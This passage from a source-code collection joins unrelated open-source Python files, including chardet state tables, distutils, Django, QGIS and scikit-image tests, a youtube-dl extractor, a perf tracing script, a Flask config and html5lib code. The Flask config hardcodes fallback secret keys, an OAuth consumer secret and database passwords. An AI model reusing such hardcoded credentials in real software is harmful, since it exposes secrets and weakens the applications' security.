eError,eError,eError,eItsMe,eError,eError,eError,eError,# 38-3f
eError,eError,eError,eError,eItsMe,eError,eStart,eStart,# 40-47
)
ISO2022JPCharLenTable = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
ISO2022JPSMModel = {'classTable': ISO2022JP_cls,
'classFactor': 10,
'stateTable': ISO2022JP_st,
'charLenTable': ISO2022JPCharLenTable,
'name': "ISO-2022-JP"}
ISO2022KR_cls = (
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,3,0,0,0, # 20 - 27
0,4,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,5,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
)
ISO2022KR_st = (
eStart, 3,eError,eStart,eStart,eStart,eError,eError,# 00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f
eItsMe,eItsMe,eError,eError,eError, 4,eError,eError,# 10-17
eError,eError,eError,eError, 5,eError,eError,eError,# 18-1f
eError,eError,eError,eItsMe,eStart,eStart,eStart,eStart,# 20-27
)
ISO2022KRCharLenTable = (0, 0, 0, 0, 0, 0)
ISO2022KRSMModel = {'classTable': ISO2022KR_cls,
'classFactor': 6,
'stateTable': ISO2022KR_st,
'charLenTable': ISO2022KRCharLenTable,
'name': "ISO-2022-KR"}
# flake8: noqa
| mit |
cnsoft/kbengine-cocos2dx | kbe/res/scripts/common/Lib/distutils/tests/test_cygwinccompiler.py | 147 | 5671 | """Tests for distutils.cygwinccompiler."""
import unittest
import sys
import os
from io import BytesIO
import subprocess
from test.support import run_unittest
from distutils import cygwinccompiler
from distutils.cygwinccompiler import (CygwinCCompiler, check_config_h,
CONFIG_H_OK, CONFIG_H_NOTOK,
CONFIG_H_UNCERTAIN, get_versions,
get_msvcr)
from distutils.tests import support
class FakePopen(object):
test_class = None
def __init__(self, cmd, shell, stdout):
self.cmd = cmd.split()[0]
exes = self.test_class._exes
if self.cmd in exes:
# issue #6438 in Python 3.x, Popen returns bytes
self.stdout = BytesIO(exes[self.cmd])
else:
self.stdout = os.popen(cmd, 'r')
class CygwinCCompilerTestCase(support.TempdirManager,
unittest.TestCase):
def setUp(self):
super(CygwinCCompilerTestCase, self).setUp()
self.version = sys.version
self.python_h = os.path.join(self.mkdtemp(), 'python.h')
from distutils import sysconfig
self.old_get_config_h_filename = sysconfig.get_config_h_filename
sysconfig.get_config_h_filename = self._get_config_h_filename
self.old_find_executable = cygwinccompiler.find_executable
cygwinccompiler.find_executable = self._find_executable
self._exes = {}
self.old_popen = cygwinccompiler.Popen
FakePopen.test_class = self
cygwinccompiler.Popen = FakePopen
def tearDown(self):
sys.version = self.version
from distutils import sysconfig
sysconfig.get_config_h_filename = self.old_get_config_h_filename
cygwinccompiler.find_executable = self.old_find_executable
cygwinccompiler.Popen = self.old_popen
super(CygwinCCompilerTestCase, self).tearDown()
def _get_config_h_filename(self):
return self.python_h
def _find_executable(self, name):
if name in self._exes:
return name
return None
def test_check_config_h(self):
# check_config_h looks for "GCC" in sys.version first
# returns CONFIG_H_OK if found
sys.version = ('2.6.1 (r261:67515, Dec 6 2008, 16:42:21) \n[GCC '
'4.0.1 (Apple Computer, Inc. build 5370)]')
self.assertEqual(check_config_h()[0], CONFIG_H_OK)
# then it tries to see if it can find "__GNUC__" in pyconfig.h
sys.version = 'something without the *CC word'
# if the file doesn't exist it returns CONFIG_H_UNCERTAIN
self.assertEqual(check_config_h()[0], CONFIG_H_UNCERTAIN)
# if it exists but does not contain __GNUC__, it returns CONFIG_H_NOTOK
self.write_file(self.python_h, 'xxx')
self.assertEqual(check_config_h()[0], CONFIG_H_NOTOK)
# and CONFIG_H_OK if __GNUC__ is found
self.write_file(self.python_h, 'xxx __GNUC__ xxx')
self.assertEqual(check_config_h()[0], CONFIG_H_OK)
def test_get_versions(self):
# get_versions calls distutils.spawn.find_executable on
# 'gcc', 'ld' and 'dllwrap'
self.assertEqual(get_versions(), (None, None, None))
# Let's fake we have 'gcc' and it returns '3.4.5'
self._exes['gcc'] = b'gcc (GCC) 3.4.5 (mingw special)\nFSF'
res = get_versions()
self.assertEqual(str(res[0]), '3.4.5')
# and let's see what happens when the version
# doesn't match the regular expression
# (\d+\.\d+(\.\d+)*)
self._exes['gcc'] = b'very strange output'
res = get_versions()
self.assertEqual(res[0], None)
# same thing for ld
self._exes['ld'] = b'GNU ld version 2.17.50 20060824'
res = get_versions()
self.assertEqual(str(res[1]), '2.17.50')
self._exes['ld'] = b'@(#)PROGRAM:ld PROJECT:ld64-77'
res = get_versions()
self.assertEqual(res[1], None)
# and dllwrap
self._exes['dllwrap'] = b'GNU dllwrap 2.17.50 20060824\nFSF'
res = get_versions()
self.assertEqual(str(res[2]), '2.17.50')
self._exes['dllwrap'] = b'Cheese Wrap'
res = get_versions()
self.assertEqual(res[2], None)
def test_get_msvcr(self):
# none
sys.version = ('2.6.1 (r261:67515, Dec 6 2008, 16:42:21) '
'\n[GCC 4.0.1 (Apple Computer, Inc. build 5370)]')
self.assertEqual(get_msvcr(), None)
# MSVC 7.0
sys.version = ('2.5.1 (r251:54863, Apr 18 2007, 08:51:08) '
'[MSC v.1300 32 bits (Intel)]')
self.assertEqual(get_msvcr(), ['msvcr70'])
# MSVC 7.1
sys.version = ('2.5.1 (r251:54863, Apr 18 2007, 08:51:08) '
'[MSC v.1310 32 bits (Intel)]')
self.assertEqual(get_msvcr(), ['msvcr71'])
# VS2005 / MSVC 8.0
sys.version = ('2.5.1 (r251:54863, Apr 18 2007, 08:51:08) '
'[MSC v.1400 32 bits (Intel)]')
self.assertEqual(get_msvcr(), ['msvcr80'])
# VS2008 / MSVC 9.0
sys.version = ('2.5.1 (r251:54863, Apr 18 2007, 08:51:08) '
'[MSC v.1500 32 bits (Intel)]')
self.assertEqual(get_msvcr(), ['msvcr90'])
# unknown
sys.version = ('2.5.1 (r251:54863, Apr 18 2007, 08:51:08) '
'[MSC v.1999 32 bits (Intel)]')
self.assertRaises(ValueError, get_msvcr)
def test_suite():
return unittest.makeSuite(CygwinCCompilerTestCase)
if __name__ == '__main__':
run_unittest(test_suite())
| lgpl-3.0 |
benjaminrigaud/django | tests/model_options/test_default_related_name.py | 41 | 1645 | from django.test import TestCase
from .models.default_related_name import Author, Editor, Book
class DefaultRelatedNameTests(TestCase):
def setUp(self):
self.author = Author.objects.create(first_name="Dave", last_name="Loper")
self.editor = Editor.objects.create(name="Test Editions",
bestselling_author=self.author)
self.book = Book.objects.create(title="Test Book", editor=self.editor)
self.book.authors.add(self.author)
self.book.save()
def test_no_default_related_name(self):
try:
self.author.editor_set
except AttributeError:
self.fail("Author should have an editor_set relation.")
def test_default_related_name(self):
try:
self.author.books
except AttributeError:
self.fail("Author should have a books relation.")
def test_related_name_overrides_default_related_name(self):
try:
self.editor.edited_books
except AttributeError:
self.fail("Editor should have a edited_books relation.")
def test_inheritance(self):
try:
# Here model_options corresponds to the name of the application used
# in this test
self.book.model_options_bookstores
except AttributeError:
self.fail("Book should have a model_options_bookstores relation.")
def test_inheritance_with_overrided_default_related_name(self):
try:
self.book.editor_stores
except AttributeError:
self.fail("Book should have a editor_stores relation.")
| bsd-3-clause |
unreal666/youtube-dl | youtube_dl/extractor/giga.py | 64 | 3820 | # coding: utf-8
from __future__ import unicode_literals
import itertools
from .common import InfoExtractor
from ..utils import (
qualities,
compat_str,
parse_duration,
parse_iso8601,
str_to_int,
)
class GigaIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?giga\.de/(?:[^/]+/)*(?P<id>[^/]+)'
_TESTS = [{
'url': 'http://www.giga.de/filme/anime-awesome/trailer/anime-awesome-chihiros-reise-ins-zauberland-das-beste-kommt-zum-schluss/',
'md5': '6bc5535e945e724640664632055a584f',
'info_dict': {
'id': '2622086',
'display_id': 'anime-awesome-chihiros-reise-ins-zauberland-das-beste-kommt-zum-schluss',
'ext': 'mp4',
'title': 'Anime Awesome: Chihiros Reise ins Zauberland – Das Beste kommt zum Schluss',
'description': 'md5:afdf5862241aded4718a30dff6a57baf',
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 578,
'timestamp': 1414749706,
'upload_date': '20141031',
'uploader': 'Robin Schweiger',
'view_count': int,
},
}, {
'url': 'http://www.giga.de/games/channel/giga-top-montag/giga-topmontag-die-besten-serien-2014/',
'only_matching': True,
}, {
'url': 'http://www.giga.de/extra/netzkultur/videos/giga-games-tom-mats-robin-werden-eigene-wege-gehen-eine-ankuendigung/',
'only_matching': True,
}, {
'url': 'http://www.giga.de/tv/jonas-liest-spieletitel-eingedeutscht-episode-2/',
'only_matching': True,
}]
def _real_extract(self, url):
display_id = self._match_id(url)
webpage = self._download_webpage(url, display_id)
video_id = self._search_regex(
[r'data-video-id="(\d+)"', r'/api/video/jwplayer/#v=(\d+)'],
webpage, 'video id')
playlist = self._download_json(
'http://www.giga.de/api/syndication/video/video_id/%s/playlist.json?content=syndication/key/368b5f151da4ae05ced7fa296bdff65a/'
% video_id, video_id)[0]
quality = qualities(['normal', 'hd720'])
formats = []
for format_id in itertools.count(0):
fmt = playlist.get(compat_str(format_id))
if not fmt:
break
formats.append({
'url': fmt['src'],
'format_id': '%s-%s' % (fmt['quality'], fmt['type'].split('/')[-1]),
'quality': quality(fmt['quality']),
})
self._sort_formats(formats)
title = self._html_search_meta(
'title', webpage, 'title', fatal=True)
description = self._html_search_meta(
'description', webpage, 'description')
thumbnail = self._og_search_thumbnail(webpage)
duration = parse_duration(self._search_regex(
r'(?s)(?:data-video-id="{0}"|data-video="[^"]*/api/video/jwplayer/#v={0}[^"]*")[^>]*>.+?<span class="duration">([^<]+)</span>'.format(video_id),
webpage, 'duration', fatal=False))
timestamp = parse_iso8601(self._search_regex(
r'datetime="([^"]+)"', webpage, 'upload date', fatal=False))
uploader = self._search_regex(
r'class="author">([^<]+)</a>', webpage, 'uploader', fatal=False)
view_count = str_to_int(self._search_regex(
r'<span class="views"><strong>([\d.,]+)</strong>',
webpage, 'view count', fatal=False))
return {
'id': video_id,
'display_id': display_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'duration': duration,
'timestamp': timestamp,
'uploader': uploader,
'view_count': view_count,
'formats': formats,
}
| unlicense |
gioman/QGIS | tests/src/python/test_qgsissue7244.py | 2 | 4500 | # -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsSpatialiteProvider
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Vincent Mora'
__date__ = '09/07/2013'
__copyright__ = 'Copyright 2013, The QGIS Project'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import qgis # NOQA
import os
from qgis.core import QgsPoint, QgsVectorLayer
from qgis.testing import start_app, unittest
from qgis.utils import spatialite_connect
# Convenience instances in case you may need them
start_app()
def die(error_message):
raise Exception(error_message)
class TestQgsSpatialiteProvider(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""Run before all tests"""
# create test db
if os.path.exists("test.sqlite"):
os.remove("test.sqlite")
con = spatialite_connect("test.sqlite", isolation_level=None)
cur = con.cursor()
cur.execute("BEGIN")
sql = "SELECT InitSpatialMetadata()"
cur.execute(sql)
# simple table with primary key
sql = "CREATE TABLE test_mpg (id SERIAL PRIMARY KEY, name STRING NOT NULL)"
cur.execute(sql)
sql = "SELECT AddGeometryColumn('test_mpg', 'geometry', 4326, 'MULTIPOLYGON', 'XY')"
cur.execute(sql)
sql = "INSERT INTO test_mpg (name, geometry) "
sql += "VALUES ('multipolygon with 8 squares', GeomFromText('MULTIPOLYGON("
for i in range(0, 4, 2):
for j in range(0, 4, 2):
sql += "(("
sql += str(i) + " " + str(j) + ","
sql += str(i + 1) + " " + str(j) + ","
sql += str(i + 1) + " " + str(j + 1) + ","
sql += str(i) + " " + str(j + 1) + ","
sql += str(i) + " " + str(j)
sql += ")),"
sql = sql[:-1] # remove last comma
sql += ")', 4326))"
cur.execute(sql)
sql = "CREATE TABLE test_pg (id SERIAL PRIMARY KEY, name STRING NOT NULL)"
cur.execute(sql)
sql = "SELECT AddGeometryColumn('test_pg', 'geometry', 4326, 'POLYGON', 'XY')"
cur.execute(sql)
sql = "INSERT INTO test_pg (name, geometry) "
sql += "VALUES ('polygon with interior ring', GeomFromText('POLYGON((0 0,3 0,3 3,0 3,0 0),(1 1,1 2,2 2,2 1,1 1))', 4326))"
cur.execute(sql)
cur.execute("COMMIT")
con.close()
@classmethod
def tearDownClass(cls):
"""Run after all tests"""
# for the time being, keep the file to check with qgis
# if os.path.exists("test.sqlite") :
# os.remove("test.sqlite")
pass
def setUp(self):
"""Run before each test."""
pass
def tearDown(self):
"""Run after each test."""
pass
def test_SplitMultipolygon(self):
"""Split multipolygon"""
layer = QgsVectorLayer("dbname=test.sqlite table=test_mpg (geometry)", "test_mpg", "spatialite")
assert(layer.isValid())
assert(layer.hasGeometryType())
layer.featureCount() == 1 or die("wrong number of features")
layer.startEditing()
layer.splitFeatures([QgsPoint(0.5, -0.5), QgsPoint(0.5, 1.5)], 0) == 0 or die("error in split of one polygon of multipolygon")
layer.splitFeatures([QgsPoint(2.5, -0.5), QgsPoint(2.5, 4)], 0) == 0 or die("error in split of two polygons of multipolygon at a time")
layer.commitChanges() or die("this commit should work")
layer.featureCount() == 7 or die("wrong number of features after 2 split")
def test_SplitTruToCreateCutEdge(self):
"""Try to creat a cut edge"""
layer = QgsVectorLayer("dbname=test.sqlite table=test_pg (geometry)", "test_pg", "spatialite")
assert(layer.isValid())
assert(layer.hasGeometryType())
layer.featureCount() == 1 or die("wrong number of features")
layer.startEditing()
layer.splitFeatures([QgsPoint(1.5, -0.5), QgsPoint(1.5, 1.5)], 0) == 0 or die("error when trying to create an invalid polygon in split")
layer.commitChanges() or die("this commit should work")
layer.featureCount() == 1 or die("wrong number of features, polygon should be unafected by cut")
if __name__ == '__main__':
unittest.main()
| gpl-2.0 |
youprofit/scikit-image | skimage/util/tests/test_unique_rows.py | 38 | 1127 | import numpy as np
from numpy.testing import assert_equal, assert_raises
from skimage.util import unique_rows
def test_discontiguous_array():
ar = np.array([[1, 0, 1], [0, 1, 0], [1, 0, 1]], np.uint8)
ar = ar[::2]
ar_out = unique_rows(ar)
desired_ar_out = np.array([[1, 0, 1]], np.uint8)
assert_equal(ar_out, desired_ar_out)
def test_uint8_array():
ar = np.array([[1, 0, 1], [0, 1, 0], [1, 0, 1]], np.uint8)
ar_out = unique_rows(ar)
desired_ar_out = np.array([[0, 1, 0], [1, 0, 1]], np.uint8)
assert_equal(ar_out, desired_ar_out)
def test_float_array():
ar = np.array([[1.1, 0.0, 1.1], [0.0, 1.1, 0.0], [1.1, 0.0, 1.1]],
np.float)
ar_out = unique_rows(ar)
desired_ar_out = np.array([[0.0, 1.1, 0.0], [1.1, 0.0, 1.1]], np.float)
assert_equal(ar_out, desired_ar_out)
def test_1d_array():
ar = np.array([1, 0, 1, 1], np.uint8)
assert_raises(ValueError, unique_rows, ar)
def test_3d_array():
ar = np.arange(8).reshape((2, 2, 2))
assert_raises(ValueError, unique_rows, ar)
if __name__ == '__main__':
np.testing.run_module_suite()
| bsd-3-clause |
chaen/DIRAC | FrameworkSystem/Service/PlottingHandler.py | 2 | 2384 | """ Plotting Service generates graphs according to the client specifications
and data
"""
__RCSID__ = "$Id$"
import os
import hashlib
from DIRAC import S_OK, S_ERROR, rootPath, gConfig, gLogger
from DIRAC.FrameworkSystem.Client.MonitoringClient import gMonitor
from DIRAC.ConfigurationSystem.Client import PathFinder
from DIRAC.Core.DISET.RequestHandler import RequestHandler
from DIRAC.FrameworkSystem.Service.PlotCache import gPlotCache
def initializePlottingHandler(serviceInfo):
# Get data location
plottingSection = PathFinder.getServiceSection("Framework/Plotting")
dataPath = gConfig.getValue("%s/DataLocation" % plottingSection, "data/graphs")
dataPath = dataPath.strip()
if "/" != dataPath[0]:
dataPath = os.path.realpath("%s/%s" % (gConfig.getValue('/LocalSite/InstancePath', rootPath), dataPath))
gLogger.info("Data will be written into %s" % dataPath)
try:
os.makedirs(dataPath)
except BaseException:
pass
try:
testFile = "%s/plot__.test" % dataPath
fd = file(testFile, "w")
fd.close()
os.unlink(testFile)
except IOError:
gLogger.fatal("Can't write to %s" % dataPath)
return S_ERROR("Data location is not writable")
gPlotCache.setPlotsLocation(dataPath)
gMonitor.registerActivity("plotsDrawn", "Drawn plot images", "Plotting requests", "plots", gMonitor.OP_SUM)
return S_OK()
class PlottingHandler(RequestHandler):
def __calculatePlotHash(self, data, metadata, subplotMetadata):
m = hashlib.md5()
m.update(repr({'Data': data, 'PlotMetadata': metadata, 'SubplotMetadata': subplotMetadata}))
return m.hexdigest()
types_generatePlot = [[dict, list], dict]
def export_generatePlot(self, data, plotMetadata, subplotMetadata={}):
""" Create a plot according to the client specification and return its name
"""
plotHash = self.__calculatePlotHash(data, plotMetadata, subplotMetadata)
result = gPlotCache.getPlot(plotHash, data, plotMetadata, subplotMetadata)
if not result['OK']:
return result
return S_OK(result['Value']['plot'])
def transfer_toClient(self, fileId, token, fileHelper):
"""
Get graphs data
"""
retVal = gPlotCache.getPlotData(fileId)
if not retVal['OK']:
return retVal
retVal = fileHelper.sendData(retVal['Value'])
if not retVal['OK']:
return retVal
fileHelper.sendEOF()
return S_OK()
| gpl-3.0 |
Pantech-Discover/android_kernel_pantech_magnus | tools/perf/scripts/python/net_dropmonitor.py | 4235 | 1554 | # Monitor the system for dropped packets and proudce a report of drop locations and counts
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
drop_log = {}
kallsyms = []
def get_kallsyms_table():
global kallsyms
try:
f = open("/proc/kallsyms", "r")
linecount = 0
for line in f:
linecount = linecount+1
f.seek(0)
except:
return
j = 0
for line in f:
loc = int(line.split()[0], 16)
name = line.split()[2]
j = j +1
if ((j % 100) == 0):
print "\r" + str(j) + "/" + str(linecount),
kallsyms.append({ 'loc': loc, 'name' : name})
print "\r" + str(j) + "/" + str(linecount)
kallsyms.sort()
return
def get_sym(sloc):
loc = int(sloc)
for i in kallsyms:
if (i['loc'] >= loc):
return (i['name'], i['loc']-loc)
return (None, 0)
def print_drop_table():
print "%25s %25s %25s" % ("LOCATION", "OFFSET", "COUNT")
for i in drop_log.keys():
(sym, off) = get_sym(i)
if sym == None:
sym = i
print "%25s %25s %25s" % (sym, off, drop_log[i])
def trace_begin():
print "Starting trace (Ctrl-C to dump results)"
def trace_end():
print "Gathering kallsyms data"
get_kallsyms_table()
print_drop_table()
# called from perf, when it finds a correspoinding event
def skb__kfree_skb(name, context, cpu, sec, nsec, pid, comm,
skbaddr, protocol, location):
slocation = str(location)
try:
drop_log[slocation] = drop_log[slocation] + 1
except:
drop_log[slocation] = 1
| gpl-2.0 |
moonso/filter_variants | filter_variants/utils/get_tabix_handle.py | 1 | 2449 | import os
import logging
import tabix
from filter_variants.warnings import (NotZippedError, NotIndexedError)
from . import bgzip_file, index_file
logger = logging.getLogger(__name__)
def get_tabix_handle(file_path):
"""Return a Tabix vcf handle
Check if vcf file is bgzipped and tabix indexed properly.
If not try to bgzip and or index the file.
Args:
file_path(str)
Returns:
file_handle(Tabix handle)
"""
try:
file_handle = open_tabix_file(file_path)
except NotZippedError as e:
logger.warning(e.message)
logger.info("Trying to bgzip file {0}".format(file_path))
try:
bgzip_file(file_path)
file_path += '.gz'
except OSError as e:
raise OSError("Bgzip does not seem to be installed on your"\
" system")
try:
logger.info("Trying to create index for file {0}".format(file_path))
index_file(file_path)
except OSError as e:
logger.critical("Tabix does not seem to be installed on your"\
" system")
logger.info("Please install tabix")
logger.info("Exiting")
sys.exit(1)
file_handle = open_tabix_file(file_path)
except NotIndexedError as e:
logger.warning(e.message)
logger.info("Trying to create index for file {0}".format(
file_path))
try:
index_file(file_path)
except OSError as e:
raise OSError("tabix does not seem to be installed on your"\
" system")
file_handle = open_tabix_file(file_path)
return file_handle
def open_tabix_file(file_path):
"""docstring for open_tabix_file"""
file_handle = tabix.open(file_path)
try:
file_handle.query('1', 1, 100)
except tabix.TabixError as e:
logger.warning("Something wrong with tabix file: {0}".format(
file_path))
file_name, file_extension = os.path.splitext(file_path)
if file_extension != '.gz':
raise NotZippedError("File {0} does not seem to be bgzipped".format(
file_path))
else:
raise NotIndexedError("File {0} does not seem to be tabix"\
" indexed".format(file_path))
return file_handle
| mit |
bubanoid/cit_presentation | config.py | 1 | 2979 | import os
def database_uri(host, username, password, db_name):
return 'postgresql+psycopg2://{username}:{password}@{host}/{db_name}'. \
format(**{'db_name': db_name, 'host': host,
'username': username,
'password': password})
class Config(object):
# Statement for enabling the development environment
DEBUG = False
TESTING = False
# Application threads. A common general assumption is
# using 2 per available processor cores - to handle
# incoming requests using one and performing background
# operations using the other.
THREADS_PER_PAGE = 2
# Define the application directory
BASE_DIR = os.path.abspath(os.path.dirname(__file__))
UPLOAD_FOLDER = os.path.join(BASE_DIR, 'media')
SQLALCHEMY_COMMIT_ON_TEARDOWN = True
DATABASE_CONNECT_OPTIONS = {}
# Enable protection against *Cross-site Request Forgery (CSRF)*
CSRF_ENABLED = True
host = 'localhost'
username = 'cituser'
password = 'citpasswd'
class ProductionDevelopmentConfig(Config):
#Define database connection parameters
host = os.getenv('OPENSHIFT_POSTGRESQL_DB_HOST', Config.host)
username = os.getenv('OPENSHIFT_POSTGRESQL_DB_USERNAME', Config.username)
password = os.getenv('OPENSHIFT_POSTGRESQL_DB_PASSWORD', Config.password)
db_name = os.getenv('OPENSHIFT_APP_NAME', 'cit')
# Define production database
SQLALCHEMY_DATABASE_URI = \
database_uri(host, username, password, db_name)
# Use a secure, unique and absolutely secret key for
# signing the data.
CSRF_SESSION_KEY = os.getenv('OPENSHIFT_CSRF_SESSION_KEY', None)
# Secret key for signing cookies
SECRET_KEY = os.getenv('OPENSHIFT_SECRET_KEY', 'jd&%G#43WG~dn6')
SITE_TITLE = os.getenv('OPENSHIFT_SITE_TITLE', 'Hi, Developer :)')
# Facebook settings
CONSUMER_KEY = os.getenv('OPENSHIFT_CONSUMER_KEY', '597071850435446')
CONSUMER_SECRET = os.getenv('OPENSHIFT_CONSUMER_SECRET',
'c0e023b09461c502cd3cd7121d205735')
if 'OPENSHIFT_POSTGRESQL_DB_HOST' not in os.environ.keys():
# Statement for enabling the development environment
DEBUG = True
# Enable protection against *Cross-site Request Forgery (CSRF)*
CSRF_ENABLED = False
class TestingConfig(Config):
# Statement for enabling the development environment
DEBUG = True
TESTING = True
# Disable protection against *Cross-site Request Forgery (CSRF)*
CSRF_ENABLED = False
#Define database connection parameters
db_name = 'cit_test'
# Define the database - we are working with
SQLALCHEMY_DATABASE_URI = \
database_uri(Config.host, Config.username, Config.password, db_name)
# Secret key for signing cookies
SECRET_KEY = "jd&%G#43WG~dn6"
SITE_TITLE = "TEST"
# Facebook settings
CONSUMER_KEY = '597071850435446'
CONSUMER_SECRET = 'c0e023b09461c502cd3cd7121d205735'
| gpl-3.0 |
ramaganapathy1/AMuDA-Ir-back-end | vEnv/lib/python2.7/site-packages/pip/_vendor/html5lib/_inputstream.py | 328 | 32532 | from __future__ import absolute_import, division, unicode_literals
from pip._vendor.six import text_type, binary_type
from pip._vendor.six.moves import http_client, urllib
import codecs
import re
from pip._vendor import webencodings
from .constants import EOF, spaceCharacters, asciiLetters, asciiUppercase
from .constants import ReparseException
from . import _utils
from io import StringIO
try:
from io import BytesIO
except ImportError:
BytesIO = StringIO
# Non-unicode versions of constants for use in the pre-parser
spaceCharactersBytes = frozenset([item.encode("ascii") for item in spaceCharacters])
asciiLettersBytes = frozenset([item.encode("ascii") for item in asciiLetters])
asciiUppercaseBytes = frozenset([item.encode("ascii") for item in asciiUppercase])
spacesAngleBrackets = spaceCharactersBytes | frozenset([b">", b"<"])
invalid_unicode_no_surrogate = "[\u0001-\u0008\u000B\u000E-\u001F\u007F-\u009F\uFDD0-\uFDEF\uFFFE\uFFFF\U0001FFFE\U0001FFFF\U0002FFFE\U0002FFFF\U0003FFFE\U0003FFFF\U0004FFFE\U0004FFFF\U0005FFFE\U0005FFFF\U0006FFFE\U0006FFFF\U0007FFFE\U0007FFFF\U0008FFFE\U0008FFFF\U0009FFFE\U0009FFFF\U000AFFFE\U000AFFFF\U000BFFFE\U000BFFFF\U000CFFFE\U000CFFFF\U000DFFFE\U000DFFFF\U000EFFFE\U000EFFFF\U000FFFFE\U000FFFFF\U0010FFFE\U0010FFFF]" # noqa
if _utils.supports_lone_surrogates:
# Use one extra step of indirection and create surrogates with
# eval. Not using this indirection would introduce an illegal
# unicode literal on platforms not supporting such lone
# surrogates.
assert invalid_unicode_no_surrogate[-1] == "]" and invalid_unicode_no_surrogate.count("]") == 1
invalid_unicode_re = re.compile(invalid_unicode_no_surrogate[:-1] +
eval('"\\uD800-\\uDFFF"') + # pylint:disable=eval-used
"]")
else:
invalid_unicode_re = re.compile(invalid_unicode_no_surrogate)
non_bmp_invalid_codepoints = set([0x1FFFE, 0x1FFFF, 0x2FFFE, 0x2FFFF, 0x3FFFE,
0x3FFFF, 0x4FFFE, 0x4FFFF, 0x5FFFE, 0x5FFFF,
0x6FFFE, 0x6FFFF, 0x7FFFE, 0x7FFFF, 0x8FFFE,
0x8FFFF, 0x9FFFE, 0x9FFFF, 0xAFFFE, 0xAFFFF,
0xBFFFE, 0xBFFFF, 0xCFFFE, 0xCFFFF, 0xDFFFE,
0xDFFFF, 0xEFFFE, 0xEFFFF, 0xFFFFE, 0xFFFFF,
0x10FFFE, 0x10FFFF])
ascii_punctuation_re = re.compile("[\u0009-\u000D\u0020-\u002F\u003A-\u0040\u005B-\u0060\u007B-\u007E]")
# Cache for charsUntil()
charsUntilRegEx = {}
class BufferedStream(object):
"""Buffering for streams that do not have buffering of their own
The buffer is implemented as a list of chunks on the assumption that
joining many strings will be slow since it is O(n**2)
"""
def __init__(self, stream):
self.stream = stream
self.buffer = []
self.position = [-1, 0] # chunk number, offset
def tell(self):
pos = 0
for chunk in self.buffer[:self.position[0]]:
pos += len(chunk)
pos += self.position[1]
return pos
def seek(self, pos):
assert pos <= self._bufferedBytes()
offset = pos
i = 0
while len(self.buffer[i]) < offset:
offset -= len(self.buffer[i])
i += 1
self.position = [i, offset]
def read(self, bytes):
if not self.buffer:
return self._readStream(bytes)
elif (self.position[0] == len(self.buffer) and
self.position[1] == len(self.buffer[-1])):
return self._readStream(bytes)
else:
return self._readFromBuffer(bytes)
def _bufferedBytes(self):
return sum([len(item) for item in self.buffer])
def _readStream(self, bytes):
data = self.stream.read(bytes)
self.buffer.append(data)
self.position[0] += 1
self.position[1] = len(data)
return data
def _readFromBuffer(self, bytes):
remainingBytes = bytes
rv = []
bufferIndex = self.position[0]
bufferOffset = self.position[1]
while bufferIndex < len(self.buffer) and remainingBytes != 0:
assert remainingBytes > 0
bufferedData = self.buffer[bufferIndex]
if remainingBytes <= len(bufferedData) - bufferOffset:
bytesToRead = remainingBytes
self.position = [bufferIndex, bufferOffset + bytesToRead]
else:
bytesToRead = len(bufferedData) - bufferOffset
self.position = [bufferIndex, len(bufferedData)]
bufferIndex += 1
rv.append(bufferedData[bufferOffset:bufferOffset + bytesToRead])
remainingBytes -= bytesToRead
bufferOffset = 0
if remainingBytes:
rv.append(self._readStream(remainingBytes))
return b"".join(rv)
def HTMLInputStream(source, **kwargs):
# Work around Python bug #20007: read(0) closes the connection.
# http://bugs.python.org/issue20007
if (isinstance(source, http_client.HTTPResponse) or
# Also check for addinfourl wrapping HTTPResponse
(isinstance(source, urllib.response.addbase) and
isinstance(source.fp, http_client.HTTPResponse))):
isUnicode = False
elif hasattr(source, "read"):
isUnicode = isinstance(source.read(0), text_type)
else:
isUnicode = isinstance(source, text_type)
if isUnicode:
encodings = [x for x in kwargs if x.endswith("_encoding")]
if encodings:
raise TypeError("Cannot set an encoding with a unicode input, set %r" % encodings)
return HTMLUnicodeInputStream(source, **kwargs)
else:
return HTMLBinaryInputStream(source, **kwargs)
class HTMLUnicodeInputStream(object):
"""Provides a unicode stream of characters to the HTMLTokenizer.
This class takes care of character encoding and removing or replacing
incorrect byte-sequences and also provides column and line tracking.
"""
_defaultChunkSize = 10240
def __init__(self, source):
"""Initialises the HTMLInputStream.
HTMLInputStream(source, [encoding]) -> Normalized stream from source
for use by html5lib.
